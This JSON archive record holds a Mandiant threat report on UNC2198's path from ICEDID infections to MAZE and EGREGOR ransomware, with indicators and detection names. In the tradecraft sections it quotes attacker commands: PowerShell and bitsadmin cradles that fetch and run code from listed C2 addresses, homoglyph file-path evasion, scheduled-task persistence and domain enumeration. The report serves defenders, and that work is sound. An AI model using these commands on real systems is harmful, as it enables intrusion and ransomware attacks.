{
	"id": "26489768-aaff-4a21-9439-a9e0ac508161",
	"created_at": "2026-04-06T00:16:55.669652Z",
	"updated_at": "2026-04-10T03:37:23.924959Z",
	"deleted_at": null,
	"sha1_hash": "025d817f8987c48eabd3548f89554f47abb5bbd9",
	"title": "So Unchill: Melting UNC2198 ICEDID to Ransomware Operations | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 629921,
	"plain_text": "So Unchill: Melting UNC2198 ICEDID to Ransomware Operations | Mandiant\r\nBy Mandiant\r\nPublished: 2021-02-25 · Archived: 2026-04-05 16:04:42 UTC\r\nWritten by: Bryce Abdo, Brendan McKeague, Van Ta\r\nMandiant Advanced Practices (AP) closely tracks the shifting tactics, techniques, and procedures (TTPs) of\r\nfinancially motivated groups who severely disrupt organizations with ransomware. In May 2020, FireEye released\r\na blog post detailing intrusion tradecraft associated with the deployment of MAZE. As of publishing this post, we\r\ntrack 11 distinct groups that have deployed MAZE ransomware. At the close of 2020, we noticed a shift in a\r\nsubset of these groups that have started to deploy EGREGOR ransomware in place of MAZE ransomware\r\nfollowing access acquired from ICEDID infections.\r\nSince its discovery in 2017 as a banking trojan, ICEDID evolved into a pernicious point of entry for financially\r\nmotivated actors to conduct intrusion operations. In earlier years, ICEDID was deployed primarily to target\r\nbanking credentials. In 2020 we observed adversaries using ICEDID more explicitly as a tool to enable access to\r\nimpacted networks, and in many cases this led to the use of common post-exploitation frameworks and\r\nultimately the deployment of ransomware. This blog post shines a heat lamp on the latest tradecraft of UNC2198,\r\nwho used ICEDID infections to deploy MAZE or EGREGOR ransomware.\r\nBuilding an Igloo: ICEDID Infections\r\nSeparate phases of intrusions are attributed to different uncategorized (UNC) groups when discrete operations\r\nsuch as obtaining access are not part of a contiguous operation. Pure “access operations” establish remote access\r\ninto a target environment for follow-on operations actioned by a separate group. 
A backdoor deployed to establish\r\nan initial foothold for another group is an example of an access operation.\r\nBetween July and December 2020, an ICEDID phishing infection chain consisted of a multi-stage process\r\ninvolving MOUSEISLAND and PHOTOLOADER (Figure 1).\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 1 of 20\n\nFigure 1: Example UNC2420 MOUSEISLAND to ICEDID Infection Chain\r\nMOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a\r\npassword-protected zip attached to a phishing email (Figure 2). Based on our intrusion data from responding to\r\nICEDID-related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER,\r\nwhich acts as an intermediary downloader to install ICEDID. Mandiant attributes the MOUSEISLAND\r\ndistribution of PHOTOLOADER and other payloads to UNC2420, a distribution threat cluster created by\r\nMandiant’s Threat Pursuit team. UNC2420 activity overlaps with the publicly reported nomenclature of\r\n“Shathak” or “TA551”.\r\nFigure 2: UNC2420 MOUSEISLAND Phishing Email\r\nIce, Ice, BEACON...UNC2198\r\nAlthough analysis is always ongoing, at the time of publishing this blog post, Mandiant tracks multiple distinct\r\nthreat clusters (UNC groups) of various sizes that have used ICEDID as a foothold to enable intrusion operations.\r\nThe most prominent of these threat clusters is UNC2198, a group that has targeted organizations in North America\r\nacross a breadth of industries. In at least five cases, UNC2198 acquired initial access from UNC2420\r\nMOUSEISLAND to conduct intrusion operations. In 2020, Mandiant attributed nine separate intrusions to\r\nUNC2198. 
UNC2198’s objective is to monetize their intrusions by compromising victim networks with\r\nransomware. In July 2020, Mandiant observed UNC2198 leverage network access provided by an ICEDID\r\ninfection to encrypt an environment with MAZE ransomware. As the year progressed into October and November,\r\nwe observed UNC2198 shift from deploying MAZE to using EGREGOR ransomware during another Incident\r\nResponse engagement. Like MAZE, EGREGOR is operated using an affiliate model, where affiliates who deploy\r\nEGREGOR receive a share of the proceeds following successful encryption and extortion for payment.\r\nThe UNC2198 cluster expanded over the course of more than six months. Mandiant’s December 2020 blog post\r\non UNCs described the analytical tradecraft we use to merge and graduate clusters of activity. Merging UNCs is a\r\nsubstantial analytical practice in which indicators and tradecraft attributed to one group are scrutinized against\r\nanother. Two former UNCs that shared similar modus operandi were eventually merged into UNC2198.\r\nThe Snowball Effect of Attribution\r\nAP created UNC2198 based on a single intrusion in June 2020 involving ICEDID, BEACON, SYSTEMBC and\r\nWINDARC. UNC2198 compromised 32 systems in 26 hours during this incident; however, ransomware was not\r\ndeployed. Throughout July 2020 we attributed three intrusions to UNC2198 from Incident Response engagements,\r\nincluding one resulting in the deployment of MAZE ransomware. In October 2020, a slew of activity at both\r\nIncident Response engagements and Managed Defense clients resulted in the creation of two new UNC groups,\r\nand another incident attributed to UNC2198.\r\nOne of the new UNC groups created in October 2020 was given the designation UNC2374. 
UNC2374 began as its\r\nown distinct cluster where BEACON, WINDARC, and SYSTEMBC were observed during an incident at a\r\nManaged Defense customer. Initial similarities in tooling did not constitute a strong enough link to merge\r\nUNC2374 with UNC2198 yet.\r\nTwo and a half months following the creation of UNC2374, we amassed enough data points to merge UNC2374\r\ninto UNC2198. Some of the data points used in merging UNC2374 into UNC2198 include:\r\nUNC2198 and UNC2374 Cobalt Strike Team Servers used self-signed certificates with the following\r\nsubject on TCP port 25055:\r\nC = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com\r\nUNC2198 and UNC2374 deployed WINDARC malware to identical file paths:\r\n%APPDATA%\\teamviewers\\msi.dll\r\nThe same code signing certificate used to sign an UNC2198 BEACON loader was used to sign two\r\nUNC2374 SYSTEMBC tunneler payloads.\r\nUNC2374 and UNC2198 BEACON C2 servers were accessed by the same victim system within a 10-\r\nminute time window during intrusion operations.\r\nThe other UNC group created in October 2020 was given the designation UNC2414. 
Three separate intrusions\r\nwere attributed to UNC2414, and as the cluster grew, we surfaced similarities between UNC2414 and UNC2198.\r\nA subset of the data points used to merge UNC2414 into UNC2198 includes:\r\nUNC2198 and UNC2414 BEACON servers used self-signed certificates with the following subject on\r\nTCP port 25055:\r\nC = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com\r\nUNC2198 and UNC2414 installed BEACON as C:\\Windows\\int32.dll\r\nUNC2198 and UNC2414 installed the RCLONE utility as C:\\Perflogs\\rclone.exe\r\nUNC2198 and UNC2414 were proven to be financially motivated actors that had leveraged ICEDID as\r\ninitial access:\r\nUNC2198 had deployed MAZE\r\nUNC2414 had deployed EGREGOR\r\nThe merge between UNC2198 and UNC2414 was significant because it revealed UNC2198 has access to\r\nEGREGOR ransomware. The timing of the EGREGOR usage is also consistent with MAZE ransomware shutting\r\ndown as reported by Mandiant Intelligence. Figure 3 depicts the timeline of related intrusions and merges into\r\nUNC2198.\r\nFigure 3: UNC2198 timeline\r\nUNC2198 Intrusion Flow: After Initial Access\r\nExpanding the UNC2198 cluster through multiple intrusions and merges with other UNC groups highlights the\r\nrange of TTPs employed. We have pulled out some key data from all our UNC2198 intrusions to illustrate an\r\namalgamation of capabilities used by the threat actor.\r\nEstablish Foothold\r\nAfter obtaining access, UNC2198 has deployed additional malware using various techniques. For instance,\r\nUNC2198 used InnoSetup droppers to install a WINDARC backdoor on the target host. UNC2198 also used BITS\r\nJobs and remote PowerShell downloads to download additional tools like SYSTEMBC for proxy and tunneler\r\ncapabilities. 
Example commands for download and execution are:\r\n%COMSPEC% /C echo bitsadmin /transfer 257e http://\u003cREDACTED\u003e/\u003cREDACTED\u003e.exe %APPDATA%\u003cREDACTED\u003e.exe \u0026 %APPDATA%\u003cREDACTED\u003e.exe \u0026 del %APPDATA% \u003cREDACTED\u003e.exe ^\u003e %SYSTEMDRIVE%\\WINDOWS\\Temp\\FmpaXUHFennWxPIM.txt \u003e \\WINDOWS\\Temp\\MwUgqKjEDjCMDGmC.bat \u0026 %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\MwUgqKjEDjCMDGmC.bat\r\n%COMSPEC% /C echo powershell.exe -nop -w hidden -c (new-object System.Net.WebClient).Downloadfile(http://\u003cREDACTED\u003e/\u003cREDACTED\u003e.exe, \u003cREDACTED\u003e.exe) ^\u003e %SYSTEMDRIVE%\\WINDOWS\\Temp\\AVaNbBXzKyxktAZI.txt \u003e \\WINDOWS\\Temp\\yoKjaqTIzJhdDLjD.bat \u0026 %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\yoKjaqTIzJhdDLjD.bat\r\nBoth commands follow the same shape: echo writes the download-and-execute one-liner into a randomly named .bat\r\nfile under \\WINDOWS\\Temp (the escaped ^\u003e keeps the inner redirect inside the batch file, while the unescaped \u003e\r\nredirects the echo output into the .bat), and a second cmd.exe then starts that batch file, so the downloader runs in\r\na separate process whose parent is cmd.exe rather than the implant.\r\nUNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE\r\noffensive security tools during this phase as well.\r\nOffensive Security Tooling\r\nUNC2198 has used offensive security tools similarly seen across many threat actors. UNC2198 has used\r\nBEACON in roughly 90% of their intrusions. UNC2198 installs and executes Cobalt Strike BEACON in a variety\r\nof ways, including shellcode loaders using PowerShell scripts, service executables, and DLLs. While the ways and\r\nmeans of using BEACON are not inherently unique, there are still aspects to extrapolate that shed light on\r\nUNC2198 TTPs.\r\nFocusing in on specific BEACON executables tells a different story beyond the use of the tool itself. 
Aside from\r\njunk code and API calls, UNC2198 BEACON and METERPRETER executables often exhibit unique\r\ncharacteristics of malware packaging, including odd command-line arguments visible within strings and upon\r\nexecution via child processes:\r\ncmd.exe /c echo TjsfoRdwOe=9931 \u0026 reg add HKCU\\SOFTWARE\\WIlumYjNSyHob /v xFCbJrNfgBNqRy /t REG_DWORD /d 3045 \u0026\r\ncmd.exe /c echo ucQhymDRSRvq=1236 \u0026 reg add HKCU\\\\SOFTWARE\\\\YkUJvbgwtylk /v KYIaIoYxqwO /t REG_DWORD /d 9633 \u0026 e\r\ncmd.exe /c set XlOLqhCejHbSNW=8300 \u0026 reg add HKCU\\SOFTWARE\\WaMgGneKhtgTTy /v LbmWADsevLywrkP /t REG_DWORD /d 380\r\nThese example commands are non-functional padding: the registry writes do not modify or alter payload execution,\r\nbut the recurring shape (cmd.exe /c echo \u003crandom\u003e=\u003cdigits\u003e \u0026 reg add HKCU\\SOFTWARE\\\u003crandom\u003e /v \u003crandom\u003e /t REG_DWORD /d \u003cdigits\u003e)\r\nis itself a usable hunting signature for this packaging.\r\nAnother technique involves installing BEACON under a file path that mixes Cyrillic homoglyphs with ASCII\r\ncharacters to evade detection; the path is shown here in Unicode-escaped and unescaped form:\r\nUnicode Escaped C:\\ProgramData\\S\\u0443sH\\u0435\\u0430ls\\T\\u0430s\\u0441host.exe\r\nUnicode Unescaped C:\\ProgramData\\SуsHеаls\\Tаsсhost.exe\r\nThe Cyrillic letters U+0443, U+0435, U+0430 and U+0441 render like Latin y, e, a and c, so the path reads as\r\nC:\\ProgramData\\SysHeals\\Taschost.exe to an analyst, while a signature, allow-list or file search written with the\r\nASCII spelling never matches it.\r\nThe executable was then executed by using a Scheduled Task named shadowdev:\r\ncmd.exe /c schtasks /create /sc minute /mo 1 /tn shadowdev /tr C:\\\\ProgramData\\\\S\\u0443sH\\u0435\\u0430ls\\\\T\\u043\r\nWhile the previous examples are related to compiled executables, UNC2198 has also used simple PowerShell\r\ndownload cradles to execute Base64-encoded and compressed BEACON stagers in memory:\r\npowershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://5.149.253[.]199:80/auth'))\r\npowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(\"hxxp://185.106.122[.]167:80/a\")\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://195.123.233[.]157:80/ca\r\nDiscovery and Reconnaissance\r\nUNC2198 has exhibited common TTPs seen across many threat groups during discovery and reconnaissance\r\nactivities. 
UNC2198 has used the BloodHound Active Directory mapping utility during intrusions from within the\r\n“C:\\ProgramData” and “C:\\Temp” directories.\r\nThe following are collective examples of various commands executed by UNC2198 over time to enumerate a\r\ncompromised environment:\r\narp -a\r\nwhoami /groups\r\nwhoami.exe /groups /fo csv\r\nwhoami /all\r\nnet user \u003cRedacted\u003e\r\nnet groups \"Domain Admins\" /domain\r\nnet group \"Enterprise admins\" /domain\r\nnet group \"local admins\" /domain\r\nnet localgroup \"administrators\" /domain\r\nnltest /domain_trusts\r\nnltest /dclist:\u003cRedacted\u003e\r\nLateral Movement and Privilege Escalation\r\nUNC2198 has used Windows Remote Management and RDP to move laterally between systems. UNC2198 has\r\nalso performed remote execution of BEACON service binaries on targeted systems to move laterally. UNC2198\r\nlaunches SMB BEACON using PowerShell, executing command lines such as the following:\r\nC:\\WINDOWS\\system32\\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA\r\nbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AH\r\nMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADIALw...\u003cTruncated\u003e\r\nDecoding the visible part of the -encodedcommand argument (UTF-16LE, then Base64) yields $s=New-O... and\r\n[Convert]::FromBase64String(\"H4sIAAAAAAAAA..., the familiar pattern of a Base64-encoded, gzip-compressed stager\r\n(H4sI is the Base64 form of the gzip magic bytes 1f 8b 08) that is decompressed and run in memory.\r\nDuring one intrusion, UNC2198 used the SOURBITS privilege escalation utility to execute files on a target\r\nsystem. SOURBITS is a packaged exploit for CVE-2020-0787, an elevation-of-privilege vulnerability in the Windows\r\nBackground Intelligent Transfer Service (BITS) disclosed and patched in 2020; the underlying bug is an arbitrary file\r\nmove, which the exploit turns into execution of an arbitrary file with elevated privileges. SOURBITS consists of code\r\nderived from a public GitHub repository, implemented as a command-line utility. 
UNC2198 used SOURBITS with the following components:\r\nC:\\Users\\\u003cUser\u003e\\Downloads\\runsysO.cr\r\nC:\\Users\\\u003cUser\u003e\\Downloads\\starterO.exe\r\nThe file runsysO.cr is an XOR-encoded PE executable that exploits CVE-2020-0787, and based on the target\r\nsystem's bitness, it will drop one of two embedded SOURBITS payloads.\r\nData Theft, Ransomware Deployment and #TTR\r\nLike other financially motivated threat actors, part of UNC2198’s modus operandi in the later stages of intrusions\r\ninvolves the exfiltration of hundreds of gigabytes of the victim organizations’ data before ransomware is installed.\r\nSpecifically, UNC2198 has used RCLONE, a command-line utility used to synchronize cloud storage, to aid in the\r\nexfiltration of sensitive data. In all observed cases of data theft, RCLONE was used by UNC2198 from the\r\n“C:\\PerfLogs\\rclone.exe” file path.\r\n“Time-to-Ransom” (TTR) is the delta between first-attributed access time and the time of ransomware\r\ndeployment. TTR serves as a useful gauge of how quickly an organization needs to respond to stave off a threat\r\nactor’s successful deployment of ransomware. TTR is not a perfect quantification, as external factors such as an\r\norganization’s security posture can drastically affect the measurement.\r\nIn this post, the TTR of UNC2198 is measured from the first ICEDID activity to the deployment of ransomware. In\r\nJuly 2020, UNC2198 deployed MAZE ransomware using PSEXEC, and the TTR was 5.5 days. In October 2020,\r\nUNC2198 deployed EGREGOR ransomware using forced GPO updates, and the TTR was 1.5 days.\r\nLooking Forward\r\nThreat actors leveraging access obtained through mass malware campaigns to deploy ransomware is a growing\r\ntrend. The efficiency of ransomware groups places a significant burden on defenders to rapidly respond before\r\nransomware deployment. 
As ransomware groups continue to gain operational expertise through successful\r\ncompromises, they will continue to shorten their TTR while scaling their operations. Understanding the TTPs\r\nfundamental to a specific operation like UNC2198 provides an edge to defenders in their response efforts. Our\r\nunparalleled understanding of groups like UNC2198 is translated into Mandiant Advantage. Accessing our\r\nholdings in Mandiant Advantage aids defenders in recognizing TTPs used by threat actors, assessing\r\norganizational risk, and taking action. Initial investments made into rapidly assessing a group’s modus operandi\r\npay dividends when they inevitably evolve and swap out components of their toolset. Whether it be MAZE or\r\nEGREGOR, something icy or hot, Advanced Practices will continue to pursue these unchill threat actors.\r\nAcknowledgements\r\nThank you to Dan Perez, Andrew Thompson, Nick Richard, Cian Lynch and Jeremy Kennelly for technical review\r\nof this content. In addition, thank you to Mandiant frontline responders for harvesting the valuable intrusion data\r\nthat enables our research.\r\nAppendix: Malware Families\r\nPHOTOLOADER is a downloader that has been observed to download ICEDID. It makes an HTTP request for a\r\nfake image file, which is RC4-decrypted to provide the final payload. Host information is sent to the command\r\nand control (C2) via HTTP cookies. Samples have been observed to contain an embedded C2 configuration that\r\ncontains the real C2 alongside a number of non-malicious domains. The non-malicious domains are contacted in\r\naddition to the real C2.\r\nWINDARC is a backdoor that hijacks the execution of TeamViewer to perform C2 communication. It supports\r\nplugins and accepts several backdoor commands. 
The commands include interacting with the TeamViewer tool,\r\nstarting a reverse shell, loading new plugins, downloading and executing files, and modifying configuration\r\nsettings.\r\nSYSTEMBC is a proxy malware that beacons to its C2 and opens new proxy connections between the C2 and\r\nremote hosts as indicated by the C2. Proxied communications are encrypted with RC4. The malware receives\r\ncommands via HTTP and creates new proxy connections as directed. Underground sales advertisements refer to\r\nthe software as a “socks5 backconnect system”. The malware is typically used to hide the malicious traffic\r\nassociated with other malware.\r\nAppendix: Detecting the Techniques\r\nFireEye security solutions detect these threats across email, endpoint, and network levels. The following is a\r\nsnapshot of existing detections related to activity outlined in this blog post.\r\nPlatform Detection Name\r\nFireEye Network Security\r\nDownloader.Macro.MOUSEISLAND\r\nDownloader.Win.PHOTOLOADER\r\nTrojan.PHOTOLOADER\r\nDownloader.IcedID\r\nTrojan.IcedID\r\nMalicious.SSL.IcedID\r\nMalicious.SSL.IcedIdCert\r\nTrojan.Malicious.Certificate\r\nBackdoor.BEACON\r\nTrojan.Generic\r\nTrojan.CobaltStrike\r\nFireEye Endpoint Security\r\nReal-Time (IOC)\r\nBLOODHOUND ATTACK PATH MAPPING (UTILITY)\r\nBLOODHOUND ATTACK PATH MAPPING A (UTILITY)\r\nCOBALT STRIKE (BACKDOOR)\r\nCOBALT STRIKE DEFAULT DLL EXPORT (BACKDOOR)\r\nCOBALT STRIKE NAMED PIPE ECHO (BACKDOOR)\r\nEGREGOR RANSOMWARE (FAMILY)\r\nICEDID (FAMILY)\r\nMAZE RANSOMWARE (FAMILY)\r\nMAZE RANSOMWARE A (FAMILY)\r\nMETASPLOIT SERVICE ABUSE (UTILITY)\r\nMOUSEISLAND (DOWNLOADER)\r\nMOUSEISLAND A (DOWNLOADER)\r\nMOUSEISLAND B (DOWNLOADER)\r\nPOWERSHELL DOWNLOADER (METHODOLOGY)\r\nPOWERSHELL DOWNLOADER D (METHODOLOGY)\r\nSCHTASK CREATION FROM PROGRAMDATA (COLLECTION)\r\nSUSPICIOUS BITSADMIN USAGE A 
(METHODOLOGY)\r\nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\r\nWMIC SHADOWCOPY DELETE (METHODOLOGY)\r\nMalware Protection (AV/MG)\r\nSYSTEMBC\r\nTrojan.EmotetU.Gen.*\r\nTrojan.Mint.Zamg.O\r\nGeneric.mg.*\r\nICEDID\r\nGen:Variant.Razy.*\r\nGeneric.mg.*\r\nBEACON\r\nGen:Trojan.Heur.TP.TGW@bug909di\r\nGen:Variant.Bulz.1217\r\nTrojan.GenericKD.34797730\r\nGeneric.mg.*\r\nAppendix: Indicators\r\n95b78f4d3602aeea4f7a33c9f1b49a97 SYSTEMBC\r\n0378897e4ec1d1ee4637cff110635141 SYSTEMBC\r\nc803200ad4b9f91659e58f0617f0dafa SYSTEMBC\r\nad4d445091a3b66af765a1d653fd1eb7 SYSTEMBC\r\n9ecf25b1e9be0b20822fe25269fa5d02 SYSTEMBC\r\ne319f5a8fe496c0c8247e27c3469b20d SYSTEMBC\r\na8a7059278d82ce55949168fcd1ddde4 SYSTEMBC\r\naea530f8a0645419ce0abe1bf2dc1584 SYSTEMBC\r\n3098fbc98e90d91805717d7a4f946c27 SYSTEMBC\r\n45.141.84.212:4132 SYSTEMBC\r\n45.141.84.223:4132 SYSTEMBC\r\n79.141.166.158:4124 SYSTEMBC\r\n149.28.201.253:4114 SYSTEMBC\r\n193.34.167.34:80 BEACON\r\n195.123.240.219:80 BEACON\r\n23.227.193.167:80 BEACON\r\n5.149.253.199:80 BEACON\r\ne124cd26fcce258addc85d7f010655ea BEACON\r\n7ae990c12bf5228b6d1b90d40ad0a79f BEACON\r\n3eb552ede658ee77ee4631d35eac6b43 BEACON\r\nc188c6145202b65a941c41e7ff2c9afd BEACON\r\n2f43055df845742d137a18b347f335a5 BEACON\r\n87dc37e0edb39c077c4d4d8f1451402c ICEDID\r\n1efababd1d6bd869f005f92799113f42 ICEDID\r\na64e7dd557e7eab3513c9a5f31003e68 ICEDID\r\n9760913fb7948f2983831d71a533a650 ICEDID\r\n14467102f8aa0a0d95d0f3c0ce5f0b59 ICEDID\r\ncolombosuede.club ICEDID\r\ncolosssueded.top  \r\ngolddisco.top ICEDID\r\njune85.cyou ICEDID\r\nAppendix: Mandiant Security Validation Actions\r\nOrganizations can validate their security controls against more than 60 actions with Mandiant Security Validation.\r\nVID 
Name\r\nA101-509 Phishing Email - Malicious Attachment, MOUSEISLAND, Macro Based Downloader\r\nA150-326 Malicious File Transfer - MOUSEISLAND, Download, Variant #1\r\nA150-433 Malicious File Transfer - MOUSEISLAND, Download, Variant #2\r\nA101-282 Malicious File Transfer - MOUSEISLAND Downloader, Download\r\nA104-632 Protected Theater - MOUSEISLAND Downloader, Execution\r\nA101-266 Command and Control - MOUSEISLAND, HTTP GET Request for PHOTOLOADER\r\nA101-280 Malicious File Transfer - PHOTOLOADER, Download\r\nA101-263 Command and Control - PHOTOLOADER, DNS Query #1\r\nA101-281 Malicious File Transfer - ICEDID Stage 3, Download\r\nA101-279 Malicious File Transfer - ICEDID Final Payload, Download\r\nA101-265 Command and Control - ICEDID, DNS Query #1\r\nA101-264 Command and Control - ICEDID, DNS Query #2\r\nA101-037 Malicious File Transfer - MAZE, Download, Variant #1\r\nA101-038 Malicious File Transfer - MAZE, Download, Variant #2\r\nA101-039 Malicious File Transfer - MAZE, Download, Variant #3\r\nA101-040 Malicious File Transfer - MAZE, Download, Variant #4\r\nA101-041 Malicious File Transfer - MAZE, Download, Variant #5\r\nA101-042 Malicious File Transfer - MAZE, Download, Variant #6\r\nA101-043 Malicious File Transfer - MAZE, Download, Variant #7\r\nA101-044 Malicious File Transfer - MAZE, Download, Variant #8\r\nA101-045 Malicious File Transfer - MAZE, Download, Variant #9\r\nA100-878 Command and Control - MAZE Ransomware, C2 Check-in\r\nA101-030 Command and Control - MAZE Ransomware, C2 Beacon, Variant #1\r\nA101-031 Command and Control - MAZE 
Ransomware, C2 Beacon, Variant #2\r\nA101-032 Command and Control - MAZE Ransomware, C2 Beacon, Variant #3\r\nA104-734 Protected Theater - MAZE, PsExec Execution\r\nA104-487 Protected Theater - MAZE Ransomware, Encoded PowerShell Execution\r\nA104-485 Protected Theater - MAZE Ransomware Execution, Variant #1\r\nA104-486 Protected Theater - MAZE Ransomware Execution, Variant #2\r\nA104-491 Host CLI - MAZE, Create Target.lnk\r\nA104-494 Host CLI - MAZE, Dropping Ransomware Note Burn Directory\r\nA104-495 Host CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant\r\nA104-496 Host CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant\r\nA104-498 Host CLI - MAZE, Desktop Wallpaper Ransomware Message\r\nA150-668 Malicious File Transfer - EGREGOR, Download\r\nA101-460 Command and Control - EGREGOR, GET DLL Payload\r\nA150-675 Protected Theater - EGREGOR, Execution, Variant #1\r\nA101-271 Malicious File Transfer - BEACON, Download, Variant #1\r\nA150-610 Malicious File Transfer - BEACON, Download\r\nA150-609 Command and Control - BEACON, Check-in\r\nA104-732 Protected Theater - BEACON, Mixed Unicode-Escaped and ASCII Characters Execution\r\nA101-514 Malicious File Transfer - WINDARC, Download, Variant #1\r\nA100-072 Malicious File Transfer - SYSTEMBC Proxy, Download\r\nA100-886 Malicious File Transfer - Rclone.exe, Download\r\nA100-880 Malicious File Transfer - Bloodhound Ingestor C Sharp Executable Variant, Download\r\nA100-881 Malicious File Transfer - Bloodhound Ingestor C Sharp PowerShell Variant, 
Download\r\nA100-882 Malicious File Transfer - Bloodhound Ingestor PowerShell Variant, Download\r\nA100-877 Active Directory - BloodHound, CollectionMethod All\r\nA101-513 Malicious File Transfer - SOURBITS, Download, Variant #1\r\nA104-733 Protected Theater - CVE-2020-0787, Arbitrary File Move\r\nA100-353 Command and Control - KOADIC Agent (mshta)\r\nA100-355 Command and Control - Multiband Communication using KOADIC\r\nA104-088 Host CLI - Timestomp W/ PowerShell\r\nA104-277 Host CLI - EICAR COM File Download via PowerShell\r\nA104-281 Host CLI - EICAR TXT File Download via PowerShell\r\nA104-664 Host CLI - EICAR, Download with PowerShell\r\nA150-054 Malicious File Transfer - EMPIRE, Download\r\nA100-327 Command and Control - PowerShell Empire Agent (http)\r\nA100-328 Lateral Movement, Execution - PsExec\r\nA100-498 Scanning Activity - TCP Port Scan for Open RDP\r\nA100-502 Scanning Activity - UDP Port Scan for Open RDP\r\nA100-316 Lateral Movement - PSSession and WinRM\r\nA104-081 Host CLI - Mshta\r\nAppendix: UNC2198 MITRE ATT\u0026CK Mapping\r\nATT\u0026CK Tactic Category Techniques\r\nResource Development\r\nAcquire Infrastructure (T1583)\r\nVirtual Private Server (T1583.003)\r\nDevelop Capabilities (T1587)\r\nDigital Certificates (T1587.003)\r\nObtain Capabilities (T1588)\r\nCode Signing Certificates (T1588.003)\r\nDigital Certificates (T1588.004)\r\nInitial Access\r\nPhishing (T1566)\r\nSpearphishing Attachment (T1566.001)\r\nExternal Remote Services (T1133)\r\nValid 
Accounts (T1078)\r\nExecution\r\nCommand and Scripting Interpreter (T1059)\r\nPowerShell (T1059.001)\r\nVisual Basic (T1059.005)\r\nWindows Command Shell (T1059.003)\r\nScheduled Task/Job (T1053)\r\nScheduled Task (T1053.005)\r\nSystem Services (T1569)\r\nService Execution (T1569.002)\r\nUser Execution (T1204)\r\nMalicious File (T1204.002)\r\nWindows Management Instrumentation (T1047)\r\nPersistence\r\nExternal Remote Services (T1133)\r\nScheduled Task/Job (T1053)\r\nScheduled Task (T1053.005)\r\nValid Accounts (T1078)\r\nPrivilege Escalation\r\nProcess Injection (T1055)\r\nScheduled Task/Job (T1053)\r\nScheduled Task (T1053.005)\r\nValid Accounts (T1078)\r\nDefense Evasion\r\nImpair Defenses (T1562)\r\nDisable or Modify System Firewall (T1562.004)\r\nDisable or Modify Tools (T1562.001)\r\nIndicator Removal on Host (T1070)\r\nTimestomp (T1070.006)\r\nIndirect Command Execution (T1202)\r\nModify Registry (T1112)\r\nObfuscated Files or Information (T1027)\r\nSteganography (T1027.003)\r\nProcess Injection (T1055)\r\nSigned Binary Proxy Execution (T1218)\r\nMshta (T1218.005)\r\nSubvert Trust Controls (T1553)\r\nCode Signing (T1553.002)\r\nValid Accounts (T1078)\r\nVirtualization/Sandbox Evasion (T1497)\r\nCredential Access\r\nOS Credential Dumping (T1003)\r\nDiscovery\r\nAccount Discovery (T1087)\r\nLocal Account (T1087.001)\r\nDomain Trust Discovery (T1482)\r\nFile and Directory Discovery (T1083)\r\nPermission Groups Discovery (T1069)\r\nSystem Information Discovery (T1082)\r\nSystem Network Configuration Discovery (T1016)\r\nSystem Owner/User Discovery (T1033)\r\nVirtualization/Sandbox Evasion (T1497)\r\nLateral Movement\r\nRemote Services (T1021)\r\nRemote Desktop Protocol (T1021.001)\r\nSMB/Windows Admin Shares 
(T1021.002)\r\nSSH (T1021.004)\r\nCollection\r\nArchive Collected Data (T1560)\r\nArchive via Utility (T1560.001)\r\nCommand and Control\r\nApplication Layer Protocol (T1071)\r\nWeb Protocols (T1071.001)\r\nEncrypted Channel (T1573)\r\nAsymmetric Cryptography (T1573.002)\r\nIngress Tool Transfer (T1105)\r\nProxy (T1090)\r\nMulti-hop Proxy (T1090.003)\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html"
	],
	"report_names": [
		"melting-unc2198-icedid-to-ransomware-operations.html"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
